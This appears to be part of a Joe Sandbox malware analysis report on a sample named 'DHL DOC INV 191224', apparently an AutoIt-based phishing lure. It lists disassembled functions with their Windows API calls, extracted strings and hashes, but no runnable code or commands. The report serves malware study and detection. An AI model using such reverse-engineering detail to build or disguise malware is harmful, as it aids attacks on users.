                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                        • API String ID: 9721498-966354055
                                                                                                                        • Opcode ID: 0ef9e21cce5728e4a361f742a103e5afb27f6d80cf1c05079848e87fbae1802f
                                                                                                                        • Instruction ID: 6f11561fe6292c89576c63abb5bc83f46801c57097d88303a9f37c2d5e22fbd2
                                                                                                                        • Opcode Fuzzy Hash: 0ef9e21cce5728e4a361f742a103e5afb27f6d80cf1c05079848e87fbae1802f
                                                                                                                        • Instruction Fuzzy Hash: C01287752142009FDB26DF14C881E6AB7E5EF89718F05885DF98A9B7A2DB31FC41CB81
                                                                                                                        Function 003C091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 003C09C6
                                                                                                                        • _wcslen.LIBCMT ref: 003C0A01
                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C0A54
                                                                                                                        • _wcslen.LIBCMT ref: 003C0A8A
                                                                                                                        • _wcslen.LIBCMT ref: 003C0B06
                                                                                                                        • _wcslen.LIBCMT ref: 003C0B81
                                                                                                                          • Part of subcall function 0034F9F2: _wcslen.LIBCMT ref: 0034F9FD
                                                                                                                          • Part of subcall function 00392BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00392BFA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                        • API String ID: 1103490817-4258414348
                                                                                                                        • Opcode ID: 1efeb9daeccfdde1dbecda061492c0be34fbb97194629e0991d863646eeafa4f
                                                                                                                        • Instruction ID: f24ed68e8ecccad1ec1a7c4a5ff5d992e74fbc8c0b3e2e6e820fd2c4bb57b205
                                                                                                                        • Opcode Fuzzy Hash: 1efeb9daeccfdde1dbecda061492c0be34fbb97194629e0991d863646eeafa4f
                                                                                                                        • Instruction Fuzzy Hash: D0E17935208741DFCB1AEF28C490A2AB7E1BF98314F15895CF8969B762D731ED45CB81
                                                                                                                        Function 003BC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharUpper
                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                        • API String ID: 1256254125-909552448
                                                                                                                        • Opcode ID: d6b6a0f05573936316549639a5926843304a40e639883f248469301292f6536e
                                                                                                                        • Instruction ID: 0d3f1788521cc8f6aa39382c0ff705bae852c994b1549ed7e359c294a2a97f2a
                                                                                                                        • Opcode Fuzzy Hash: d6b6a0f05573936316549639a5926843304a40e639883f248469301292f6536e
                                                                                                                        • Instruction Fuzzy Hash: 5C71163262012A8BCB32DE3CCD415FF3795AB60758F262128FE55ABA85E731DD4583A0
                                                                                                                        Function 003C833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 003C835A
                                                                                                                        • _wcslen.LIBCMT ref: 003C836E
                                                                                                                        • _wcslen.LIBCMT ref: 003C8391
                                                                                                                        • _wcslen.LIBCMT ref: 003C83B4
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 003C83F2
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,003C5BF2), ref: 003C844E
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003C8487
                                                                                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 003C84CA
                                                                                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 003C8501
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 003C850D
                                                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003C851D
                                                                                                                        • DestroyIcon.USER32(?,?,?,?,?,003C5BF2), ref: 003C852C
                                                                                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 003C8549
                                                                                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 003C8555
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                        • String ID: .dll$.exe$.icl
                                                                                                                        • API String ID: 799131459-1154884017
                                                                                                                        • Opcode ID: 1186b7de7a8355f07e742aa3b1bdd89cc28f8d98754c2b4d16bfe0ce78a4ca9d
                                                                                                                        • Instruction ID: dbf1df8364cc47aaf3a4433a38a89b3db209f552023ece8fd9f1ca7503793675
                                                                                                                        • Opcode Fuzzy Hash: 1186b7de7a8355f07e742aa3b1bdd89cc28f8d98754c2b4d16bfe0ce78a4ca9d
                                                                                                                        • Instruction Fuzzy Hash: E661DF71500219BAEB1ADF65CC81FBE77ACBB05B11F10460AF915DA0D1DBB4AE90CBA0
                                                                                                                        Function 00337778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                        • API String ID: 0-1645009161
                                                                                                                        • Opcode ID: 3582d0c632e894d39370ea52216400325780f1c188002f9c6ce5a2cfae119c75
                                                                                                                        • Instruction ID: 33e84e0f95355229927dca2fb428bd8f31c398fae41fb9122931e4e88fdf4af3
                                                                                                                        • Opcode Fuzzy Hash: 3582d0c632e894d39370ea52216400325780f1c188002f9c6ce5a2cfae119c75
                                                                                                                        • Instruction Fuzzy Hash: FA81E5B1A04605BBDB37AF60CC83FBE77A8AF15301F058025F909AE192EBB5D945C791
                                                                                                                        Function 00395A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadIconW.USER32(00000063), ref: 00395A2E
                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00395A40
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00395A57
                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00395A6C
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00395A72
                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00395A82
                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00395A88
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00395AA9
                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00395AC3
                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00395ACC
                                                                                                                        • _wcslen.LIBCMT ref: 00395B33
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00395B6F
                                                                                                                        • GetDesktopWindow.USER32 ref: 00395B75
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00395B7C
                                                                                                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00395BD3
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00395BE0
                                                                                                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00395C05
                                                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00395C2F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 895679908-0
                                                                                                                        • Opcode ID: f89c70822905873ccd8d2efd8f26344a064b5b7b044f32abbe24a23b6e0bc86e
                                                                                                                        • Instruction ID: 9d155fa364839b97715f5940dc23709533ce2c72d559c11c906c59d1bfcf24d3
                                                                                                                        • Opcode Fuzzy Hash: f89c70822905873ccd8d2efd8f26344a064b5b7b044f32abbe24a23b6e0bc86e
                                                                                                                        • Instruction Fuzzy Hash: E7716C31900B09AFDF22DFA8CE85E6EBBF9FF48704F104518E586A65A0D775A990CB50
                                                                                                                        Function 003930F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[?
                                                                                                                        • API String ID: 176396367-1448639043
                                                                                                                        • Opcode ID: 177f9012f259230eaef32e03a4e049040d473e58597badfbf6ba2b8fdd91261e
                                                                                                                        • Instruction ID: a555c3974ee41f83575249f658547f4227308302b012e0a1f58f26fc0f89f15f
                                                                                                                        • Opcode Fuzzy Hash: 177f9012f259230eaef32e03a4e049040d473e58597badfbf6ba2b8fdd91261e
                                                                                                                        • Instruction Fuzzy Hash: 25E1E572A00516ABCF1B9FA8C481BFEFBB4BF44710F568119E556FB250DB30AE858790
                                                                                                                        Function 003C911E Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 181windowfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                                                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 003C9147
                                                                                                                          • Part of subcall function 003C7674: ClientToScreen.USER32(?,?), ref: 003C769A
                                                                                                                          • Part of subcall function 003C7674: GetWindowRect.USER32(?,?), ref: 003C7710
                                                                                                                          • Part of subcall function 003C7674: PtInRect.USER32(?,?,003C8B89), ref: 003C7720
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003C91B0
                                                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003C91BB
                                                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003C91DE
                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003C9225
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003C923E
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003C9255
                                                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003C9277
                                                                                                                        • DragFinish.SHELL32(?), ref: 003C927E
                                                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003C9371
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#@$xV
                                                                                                                        • API String ID: 221274066-1020208282
                                                                                                                        • Opcode ID: 32ff6184d0ded994427a584d460225cb3c12cbc23ea0ce1299fda2f055b18252
                                                                                                                        • Instruction ID: 30d93a0a6c1d8c0b9b7961b2b1be459276aceaeb193245c306838f8668ef1494
                                                                                                                        • Opcode Fuzzy Hash: 32ff6184d0ded994427a584d460225cb3c12cbc23ea0ce1299fda2f055b18252
                                                                                                                        • Instruction Fuzzy Hash: 76618D71108305AFC702DF64DD89EAFBBE8EF88750F00492EF595971A0DB70AA49CB52
                                                                                                                        Function 003500C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003500C6
                                                                                                                          • Part of subcall function 003500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0040070C,00000FA0,2FC0ADF4,?,?,?,?,003723B3,000000FF), ref: 0035011C
                                                                                                                          • Part of subcall function 003500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003723B3,000000FF), ref: 00350127
                                                                                                                          • Part of subcall function 003500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003723B3,000000FF), ref: 00350138
                                                                                                                          • Part of subcall function 003500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0035014E
                                                                                                                          • Part of subcall function 003500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0035015C
                                                                                                                          • Part of subcall function 003500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0035016A
                                                                                                                          • Part of subcall function 003500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00350195
                                                                                                                          • Part of subcall function 003500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003501A0
                                                                                                                        • ___scrt_fastfail.LIBCMT ref: 003500E7
                                                                                                                          • Part of subcall function 003500A3: __onexit.LIBCMT ref: 003500A9
                                                                                                                        Strings
                                                                                                                        • kernel32.dll, xrefs: 00350133
                                                                                                                        • SleepConditionVariableCS, xrefs: 00350154
                                                                                                                        • InitializeConditionVariable, xrefs: 00350148
                                                                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00350122
                                                                                                                        • WakeAllConditionVariable, xrefs: 00350162
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                        • API String ID: 66158676-1714406822
                                                                                                                        • Opcode ID: d2bdadc748447ed92e835bba67dba1c6cb7131944385cbb1b335c974ab02eb2e
                                                                                                                        • Instruction ID: f7d25b1379f92bbe78ead8d11d2a6f82e8f3e6be4527bf8ad27d93b8e7e19d91
                                                                                                                        • Opcode Fuzzy Hash: d2bdadc748447ed92e835bba67dba1c6cb7131944385cbb1b335c974ab02eb2e
                                                                                                                        • Instruction Fuzzy Hash: C62129366407006FE7176B64AC0AF6A73D8DB04B52F05013AFC05E72E1DF75AC048B95
                                                                                                                        Function 003A44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CharLowerBuffW.USER32(00000000,00000000,003CCC08), ref: 003A4527
                                                                                                                        • _wcslen.LIBCMT ref: 003A453B
                                                                                                                        • _wcslen.LIBCMT ref: 003A4599
                                                                                                                        • _wcslen.LIBCMT ref: 003A45F4
                                                                                                                        • _wcslen.LIBCMT ref: 003A463F
                                                                                                                        • _wcslen.LIBCMT ref: 003A46A7
                                                                                                                          • Part of subcall function 0034F9F2: _wcslen.LIBCMT ref: 0034F9FD
                                                                                                                        • GetDriveTypeW.KERNEL32(?,003F6BF0,00000061), ref: 003A4743
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                        • API String ID: 2055661098-1000479233
                                                                                                                        • Opcode ID: 8c7c612ad472570d836c1a929963307f481245e4fe2cdb9d5da436be480df8e7
                                                                                                                        • Instruction ID: d20f191a2182f97e402e432ce5054bc56b0a8e9140cd04428b6d3984406a1b0a
                                                                                                                        • Opcode Fuzzy Hash: 8c7c612ad472570d836c1a929963307f481245e4fe2cdb9d5da436be480df8e7
                                                                                                                        • Instruction Fuzzy Hash: 61B1EF316083029FC716DF28C891A6AB7E5EFE7720F51491DF496CB2A1E7B1D844CB92
                                                                                                                        Function 003C6CD9 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 194windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DestroyWindow.USER32(?,?), ref: 003C6DEB
                                                                                                                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003C6E5F
                                                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003C6E81
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C6E94
                                                                                                                        • DestroyWindow.USER32(?), ref: 003C6EB5
                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00330000,00000000), ref: 003C6EE4
                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C6EFD
                                                                                                                        • GetDesktopWindow.USER32 ref: 003C6F16
                                                                                                                        • GetWindowRect.USER32(00000000), ref: 003C6F1D
                                                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003C6F35
                                                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003C6F4D
                                                                                                                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                        • String ID: 0$tooltips_class32$xV
                                                                                                                        • API String ID: 2429346358-703866487
                                                                                                                        • Opcode ID: b8a484f45dc8b0909883ab872700d9f666d1a5ff5fe8e38d81ff747b3057125c
                                                                                                                        • Instruction ID: b850a23b0fa6f4ad20362ede217385762b1bff5e92c01c5f539be380254f1753
                                                                                                                        • Opcode Fuzzy Hash: b8a484f45dc8b0909883ab872700d9f666d1a5ff5fe8e38d81ff747b3057125c
                                                                                                                        • Instruction Fuzzy Hash: 6D715574104244AFDB22DF28DD59FAABBE9EF89304F08442EF989D7261C770AD06DB15
                                                                                                                        Function 003BAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 003BB198
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BB1B0
                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BB1D4
                                                                                                                        • _wcslen.LIBCMT ref: 003BB200
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BB214
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BB236
                                                                                                                        • _wcslen.LIBCMT ref: 003BB332
                                                                                                                          • Part of subcall function 003A05A7: GetStdHandle.KERNEL32(000000F6), ref: 003A05C6
                                                                                                                        • _wcslen.LIBCMT ref: 003BB34B
                                                                                                                        • _wcslen.LIBCMT ref: 003BB366
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003BB3B6
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 003BB407
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 003BB439
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003BB44A
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003BB45C
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003BB46E
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 003BB4E3
                                                                                                                        Memory Dump Source
